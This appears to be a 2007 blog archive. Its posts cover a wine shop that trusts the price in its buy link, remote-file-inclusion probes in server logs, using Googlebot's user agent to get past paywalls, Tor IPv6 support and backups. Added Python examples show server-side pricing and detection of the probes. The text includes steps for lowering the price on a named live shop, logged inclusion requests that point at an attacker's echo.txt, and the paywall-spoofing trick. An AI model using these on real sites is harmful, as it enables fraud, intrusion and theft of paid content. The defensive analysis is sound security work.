Archive for the ‘Computer technology’ Category

Weingut-martin’s excellent security-designed website

Sunday, December 30th, 2007

The wine webshop http://www.weingut-martin.de/ is this week's winner of my brand new Best Security Ever award.

  1. Visit their site, http://www.weingut-martin.de/
  2. Find something you want to order.
  3. Look at the link to Kaufen (buy): (link cut here to avoid very long line):
    http://www.weingut-martin.de/warenkorb.php?cmd=new \
    &bestell=2612 \
    &name=Homburger%20Kallmuth%20Silvaner%20Kabinett%20halbtrocken \
    &preis=4.80&tip=boxbeutel
  4. Notice how preis (price) is part of this link. Don’t just click Kaufen to buy, copy the url and change the &preis variable to something like 0.50 and paste that link into your browser…
  5. Cheap wine!

Now, I’m not saying you should actually go ahead and do this and finalize the order (which actually works). I’m just saying that that is a great security design right there. Really thought-through.
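The defect above is a shop that trusts a price sent by the client. The following is an added example, not the shop's own code: the weak pattern next to a hardened handler that looks the price up server-side by article number and flags any client-supplied price that disagrees. The catalogue entry is an assumption built from the link quoted above.

```python
from decimal import Decimal
from urllib.parse import urlsplit, parse_qs

# Constructed server-side price list keyed by article number (the "bestell"
# parameter). The shop's real catalogue is not known; this entry is an
# assumption built from the link quoted in the post.
CATALOGUE = {
    "2612": {"name": "Homburger Kallmuth Silvaner Kabinett halbtrocken",
             "preis": Decimal("4.80"), "tip": "boxbeutel"},
}

def query_params(url):
    """Flatten the query string of a warenkorb.php-style link into a dict."""
    return {k: v[0] for k, v in parse_qs(urlsplit(url).query).items()}

def add_to_cart_trusting_client(url):
    """The weak pattern the post describes: the price is read from the link."""
    p = query_params(url)
    return {"bestell": p["bestell"], "preis": Decimal(p["preis"])}

def add_to_cart_server_priced(url):
    """Hardened version: only the article number is taken from the client.
    The price comes from the server-side catalogue, and a client-supplied
    price that disagrees is flagged so the request can be logged and refused."""
    p = query_params(url)
    item = CATALOGUE.get(p.get("bestell"))
    if item is None:
        raise ValueError("unknown article number")
    tampered = "preis" in p and Decimal(p["preis"]) != item["preis"]
    return {"bestell": p["bestell"], "preis": item["preis"], "tampered": tampered}

# The link quoted in the post, and a copy with the price altered as step 4 describes.
ORIGINAL = ("http://www.weingut-martin.de/warenkorb.php?cmd=new&bestell=2612"
            "&name=Homburger%20Kallmuth%20Silvaner%20Kabinett%20halbtrocken"
            "&preis=4.80&tip=boxbeutel")
ALTERED = ORIGINAL.replace("preis=4.80", "preis=0.50")

if __name__ == "__main__":
    print(add_to_cart_trusting_client(ALTERED))   # the 0.50 is accepted as-is
    print(add_to_cart_server_priced(ALTERED))     # catalogue price, tampered=True
```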



What, oh What are the Pakihackers up to?

Tuesday, August 14th, 2007

The Pakihackers started showing up in various hitlogs recently.

Hitlog evidence

Hitlog story regarding the Pakihackers Corp. is this:

220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] "GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1" 404 8269 "-" "libwww-perl/5.808"
220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] "GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1" 404 22871 "-" "libwww-perl/5.808"
220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] "GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1" 404 8206 "-" "libwww-perl/5.808"

Bad for your server

Everything indicates that Pakihackers are very bad for you and your server(s).

130.232.220.in-addr.arpa. 10800 IN      SOA     ns1.pacific.net.hk. postmaster.pacific.net.hk

It really did not shock me to learn that Pakihackers are .hk based. It does look like they are doing automatic checks for some kind of WP/WPMU exploit.

Pakihackers scanning is not dangerous if you are using recent versions of WPMU (v.1.2.3 / v1.2.4). But it’s kind of annoying, because they keep on hammering these lame requests all day long. Perhaps Pakihackers are bad for you if you’re using some ancient WP version, who knows.
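The hitlog lines above are remote-file-inclusion probes: a query parameter pointing at a file on the scanner's own host. As an added example (not code from the post), here is a small parser for those combined-format lines that flags any request whose parameters carry a remote URL and counts them per client IP. The three probe lines are the ones quoted above; the fourth, benign line is constructed.

```python
import re
from collections import Counter
from urllib.parse import urlsplit, parse_qs, unquote

# Apache "combined" log format, which is what the hitlog in the post uses.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<time>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+) (?P<proto>[^"]+)" '
    r'(?P<status>\d{3}) (?P<size>\S+) "(?P<referer>[^"]*)" "(?P<ua>[^"]*)"$')

def parse_line(line):
    """Return the log fields as a dict, or None if the line does not parse."""
    m = LOG_RE.match(line.strip())
    return m.groupdict() if m else None

def is_rfi_probe(path):
    """True when any query parameter carries a remote URL, the tell-tale of a
    remote-file-inclusion probe such as admin.php?page=http://.../echo.txt?"""
    query = urlsplit(path).query
    for values in parse_qs(query, keep_blank_values=True).values():
        if any(re.match(r'(?i)(https?|ftp)://', unquote(v)) for v in values):
            return True
    return False

def scan(lines):
    """Count RFI probes per client IP and record the user agents each used."""
    probes, agents = Counter(), {}
    for line in lines:
        rec = parse_line(line)
        if rec and is_rfi_probe(rec["path"]):
            probes[rec["ip"]] += 1
            agents.setdefault(rec["ip"], set()).add(rec["ua"])
    return probes, agents

# The three hitlog lines quoted in the post, plus one constructed benign hit.
SAMPLE_LOG = [
    '220.232.130.49 - - [14/Aug/2007:12:00:08 -0400] "GET /2007/07/23/4/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1" 404 8269 "-" "libwww-perl/5.808"',
    '220.232.130.49 - - [14/Aug/2007:12:00:10 -0400] "GET /admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1" 404 22871 "-" "libwww-perl/5.808"',
    '220.232.130.49 - - [14/Aug/2007:12:00:12 -0400] "GET /2007/07/23/admin.php?page=http://www.pakihackers.net/echo.txt? HTTP/1.1" 404 8206 "-" "libwww-perl/5.808"',
    '10.0.0.5 - - [14/Aug/2007:12:01:00 -0400] "GET /2007/07/23/?page=about HTTP/1.1" 200 1234 "-" "Mozilla/5.0"',
]

if __name__ == "__main__":
    probes, agents = scan(SAMPLE_LOG)
    for ip, n in probes.most_common():
        print(f"{ip}: {n} RFI probes, agents={sorted(agents[ip])}")
```

Because the probes all 404, the check on the request path rather than the status is what makes them visible; a hit count per IP is enough to feed a rate limit or block list.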



Tor to get IPv6 support?

Monday, June 4th, 2007

Tor is a great anonymous communications system that resists traffic analysis, but as of now it, sadly, only lets you use IPv4 services anonymously and securely.

Xiando SIGiNT has picked up a lot of chatter about IPv6 support being added to Tor on #tor at oftc. It is strongly indicated that Tor will be able to connect to IPv6-only websites in the very near future. This means that Tor-users will be able to enjoy the world of IPv6 services securely without actually having IPv6 themselves.

This may not sound like breaking news, but oh it is, it’s very good news indeed. IPv6 has already become the dominant standard in civilized parts of the world such as Japan, and some of the sites in these countries are only available to IPv6 users. Foreign-devil Tor-users who only have IPv4 may be able to experience these sites in the near future - if the chatter picked up by xiando SIGiNT is close to correct.



Creative SEO: Who’s there? Google? Here’s a page, just for you!

Wednesday, February 21st, 2007

It’s been.. uhm.. “rumored” that some sites that require you to pay and log in to read their content treat web-crawlers differently and allow them to crawl “restricted” content. Which is nice, since all you have to do to access such sites without paying is to say you’re Google.

After pretending to be Google for a few days I’ve noticed something. Many websites seem to give a different page depending on who visits. For example, this is the front page at www.bluecoat.com:

bluecoat1.jpg

Doesn’t look very fancy, does it? That is because they serve Google (and anyone/thing who pretends to be Google) a completely different page.

Their website actually looks like this - in most browsers:

bluecoat2.jpg

This is what’s called doing black-hat “search engine optimization”.

Except for one little detail. The problem with all kinds of “dirty trick” black-hat SEO is that it doesn’t work.

And it especially doesn’t work with Google. See, here’s a little dirty secret about GoogleBot: It sometimes lies about who’s there! It will fetch the root page / using its normal User-Agent, wait a while, and re-crawl the same page / using an (outdated beta-version of a Linux-only) web browser string.

I don’t actually know what Google (or more correctly, their bot..) thinks of websites that give them a different page. But I do not think their bot likes that kind of SEO. And as mentioned, it’s not like you’re fooling anyone by trying to give search-engines a different page; most of them now check at least one page on your site using a “fake” (as in not their own) User-Agent string.

But I actually like getting a simpler “SEO” page. It’s much simpler to find what you’re looking for using a “Web 0.1” plain text link-list - in most cases…

Just one more little detail regarding SEO: It does not work. Forget about the SE part. Just optimize your sites for human visitors. If they like it then real people who like your site will link to your site and pages on your site, and that’s the only kind of SEO which actually works. Period.



Are you sure your backup-routines are sufficient?

Friday, January 12th, 2007

The main hard drive in one of our servers died a week before Christmas. It was a total crisis, and also a test of backup-routines. The crisis was that the server was unavailable until the datacenter where it is co-located could replace the hard drive, and also that the backups were stored in a place with high bandwidth in (so backups could be transferred to it quickly) and almost no bandwidth out (which means that it took quite a while to restore the backups). This - all in all - caused quite a bit of downtime because the backups had to be slowly transferred to other servers that temporarily did the job of the server with the defective hard drive, and it also put a larger load on these servers because they suddenly got an unforeseen load-increase.

And by unforeseen load-increase I mean that doing backups regularly is something that, luckily, was covered, but what to do with them, what server to restore them to and how was not even considered before the crisis was there.

So. If you are a CEO or just a normal IT guy in a corporation, you may want to consider:

  • Do you have backup-routines that cover all important data on all servers (all data that is not programs that are included in the OS, etc)?
  • Do you have routines for where this data should be restored to in order to bring backed-up services up immediately using alternative server(s)?
  • Do you have alternative servers ready to run affected services if one or more servers go down?

The reason these questions come to light today is this:

“Date : 01/11/2007

Reboot is failing, BIOS is not detecting your disk but is waiting forever.

At this point I can only offer a reinstall on a new drive of the linux of your choice (I recommend CentOS 4.4 as it’s the quickest install) and slaving your old drive in hopes of some data recovery. This assumes the drive can even be hooked to the IDE bus as a slave without preventing system boot.

Please update this ticket to tell us how you wish to proceed.”

Yes. Another server stopped responding. The datacenter was asked to reboot it. They did and this is what they had to say about it. Great. Another dead hard drive. The more servers you have, the more trouble you have.

Luckily, it did not really matter much that the server died. It was one of the servers used to run the YacySearch search-engine. An index of about a million URLs and their keywords was “lost”. Well, “lost” as in it does not matter enough to make backups of or attempt to restore the data from the previous hard drive - since it is only a matter of re-crawling and re-indexing them, but still, data was lost because there were no backup routines for it.

The result, in this case, was that YacySearch is temporarily slightly slower and temporarily shows a few fewer search-results for a few keywords. But service downtime and losses could have been greater. So a word of advice: Check your backup-routines, and the routines for keeping your services running if a server fails.

This also applies to personal computers. Imagine this: The computer you are currently using to read this just died. Its hard drive is defective. Everything on it is gone forever. Does it bother you? If it does, then your backup-routines are not good enough.

